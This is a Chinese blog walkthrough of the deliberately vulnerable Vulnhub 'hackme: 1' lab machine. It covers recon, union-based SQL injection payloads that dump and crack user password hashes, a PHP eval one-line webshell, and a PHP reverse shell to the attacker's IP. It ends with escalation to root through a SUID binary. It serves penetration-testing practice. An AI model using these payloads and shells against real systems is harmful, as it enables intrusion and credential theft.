Vulnhub靶机——Hackme-1

已于 2025-02-14 15:38:53 修改
阅读量1k 收藏 21
点赞数 21
分类专栏: 靶场练习 # Vulnhub 文章标签: 安全 web安全 数据库
于 2025-02-14 15:30:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52854348/article/details/145634355
版权

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 目录扫描

三、漏洞利用

3.1 SQL注入

3.2 文件上传

四、权限提升

4.1 蚁剑连接

4.2 nc反弹连接

一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: hackme: 1 ~ VulnHub

(2)通过上述简介可以知道,此靶机通过Web漏洞获得有限权限访问,并随后通过提权获得root权限。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

二、站点信息收集

2.1 IP扫描

使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.139

arp-scan -l

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口

(2)访问80端口http://192.168.101.139,发现有一个登录页面,还可以进行注册

2.3 目录扫描

(1)使用dirsearch工具对网站目录进行扫描

dirsearch -u 192.168.101.139

(2)访问/uploads/目录,猜测应该是一个文件上传的目录

三、漏洞利用

3.1 SQL注入

(1)进入注册页面,注册一个新用户并登录

(2)登录后页面有一个搜索框,可以尝试SQL注入

(3)单击search可以看到很多书名

(4)通过验证可知存在字符型(单引号)SQL注入

OSINT' and 1=1#
OSINT' and 1=2#

(5)判断字段数

OSINT' order by 3#
OSINT' order by 4#

(6)确定回显点

-1' union select 1,2,3#

(7)查看版本号和数据库名

-1' union select version(),database(),3#

(8)查看表名,发现一个user表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#

(9)查看user表的字段信息

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#

(10)查看用户名和密码,并进行MD5解密

-1' union select group_concat(user),group_concat(pasword),3 from users#

user

pasword

MD5解密

user1

5d41402abc4b2a76b9719d911017c592

hello

User2

6269c4f71a55b24bad0f0267d9be5508

commando

user3

0f359740bd1cda994f8b55330c86d845

p@ssw0rd

test

05a671c66aefea124cc08b76ea6d30bb

testtest

superadmin

2386acb2cf356944177746fc92523983

Uncrackable

test1

05a671c66aefea124cc08b76ea6d30bb

testtest

(11)发现有一个superadmin用户,猜测是管理员用户,登录一下,发现页面可以进行文件上传

3.2 文件上传

(1)新建一个info.php文件,上传该文件

<?php phpinfo();?>

(2)拼接上面目录扫描找到的路径进行访问,发现php文件可以成功上传

四、权限提升

4.1 蚁剑连接

(1)新建一个muma.php,上传一句话木马

<?php @eval($_POST['cmd']);?> //密码是cmd

(2)使用蚁剑进行连接,URL地址填写一句话木马的地址,密码是cmd,连接成功

4.2 nc反弹连接

(1)新建一个nc.php文件,编写nc反弹脚本并上传到网站

<?php

$sock=fsockopen("192.168.101.130",9999);//这里是kali的IP

exec("/bin/bash -i <&3 >&3 2>&3");

?>

(2)kali中开启监听

nc -lvvp 9999

(3)打开蚁剑中的虚拟终端,查看目录发现文件上传成功,执行nc.php文件

(4)kali监听成功

(5)显示系统用户,并筛选使用Bash作为默认shell的用户

cat /etc/passwd | grep /bin/bash

(6)转到/home/hackme目录下查看文件,发现有一个touchmenot文件

(7)执行该文件即可提权成功

./touchmenot

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

(Vulnhub练习)-- HACKME: 1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-06 3756
(Vulnhub练习)-- HACKME: 1渗透实战 下载地址 https://www.vulnhub.com/entry/hackme-1,330/ 扫描主机 netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.134 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 807
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
Vulnhub-hackme1
GALi_233的博客
03-06 3441
Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the pos
Metasploitable2靶机
最新发布
cjchsh的博客
04-07 1216
Metasploitable2靶机
HACKME-1 打靶
weixin_57315671的博客
06-16 349
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 1315
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4433
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 918
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2649
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub系列:hackme
jq_j37的博客
08-14 563
vulnhub系列:hackme靶机,打靶文章
vulnhub靶机hackme
weixin_68416970的博客
06-14 671
猜测superadmin用户是管理员,登录一下试试。存在SQL注入,使用sqlmap工具注入后面的。发现靶机IP是192.168.109.132。登录主页发现登录页面,而且还可以注册用户。从响应数据包可以看出来已经上传到文件夹了。创建用户admin,密码123456。使用dirsearch工具扫描目录。创建完成后登录admin用户。设置网络模式为net模式。发现开放了22、80端口。将得到的密码用md5解密。访问目录扫描出来的路径。发现是一个文件上传页面。复制图片链接用蚁剑连接。发现存在文件上传漏洞。
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1477
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
Vulnhub-hackme2
GALi_233的博客
03-20 4031
Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is
Vulnhub 靶场 HACK ME PLEASE: 1
weixin_52374319的博客
05-11 604
Vulnhub 靶场 HACK ME PLEASE: 1 前期准备工作: 靶机下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/ kali攻击机ip地址:192.168.43.135(桥接) 靶机地址:192.168.43.228(桥接) 信息收集: 靶机地址: netdiscover -r 192.168.43.0/24 开放端口: nmap -p 1-65535 192.168.43.228 发现80,3306,33060端口开放
Vulnhub-Hackme靶机
m0_74786138的博客
03-05 809
存在两个可疑文件,但不知道怎么利用,进入另一个目录看看,发现一个脚本。进入环境先信息收集一波,不过目录是web服务下的,没什么可用信息。:将结果输出全部在第一字段里,2和3是为了填充查询列,避免出错。这里有很多用户以及他们密码的md5值,我们看比较重要的,进入**/home** 目录查看,发现两个可疑文件夹,访问uploads界面,可以正常上传,且可以访问。如下,有一个文件上传点,结合之前扫描出来的。ok,直接把提权脚本给我们了,执行该脚本。先看看,看来有数据库,可能是。是一个查询界面,查询书名。
VulnHub-hackme1漏洞利用流程
2301_76786857的博客
06-13 374
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 7936
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值